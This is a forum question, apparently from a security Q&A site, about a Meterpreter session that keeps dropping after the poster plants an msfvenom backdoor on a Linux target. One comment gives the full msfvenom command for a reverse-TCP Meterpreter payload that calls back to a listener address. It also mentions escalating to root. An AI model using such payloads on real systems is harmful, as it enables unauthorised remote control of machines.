# After connecting to my backdoor, Meterpreter session is unstable and not usable

Tags: metasploit, meterpreter, msfvenom

I uploaded my backdoor (made using msfvenom) and executed it on the remote machine. I'm able to connect to it using `multi/handler` , but after a while I get disconnected and then when I try to exploit again, I see the following behavior:

- Multiple sessions keep opening, but they don't fully open (there is no Meterpreter prompt)
- If I go to view the sessions, I see that they're missing the Information section
- If I interact with a session, all commands don't work
- The sessions die after a few minutes

What is the cause of this behavior?

[image]

Comment: Have you tried using an HTTP stager instead? Just curious.

Comment: What is the target OS? How are you executing the payload?

Comment: Not HTTP, but I'ved tried both reverse and bind TCP.

Comment: The target is a linux i868. I made a backdoor file using this command: `msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.16.40.7 LPORT=9876 -f elf > shell.elf`. I then executed the file using a low-priv Meterpreter session that managed to get a root shell. It successfully opened a Meterpreter session, which died after a few minutes and then I started seeing this multiple sessions opening/dying problem.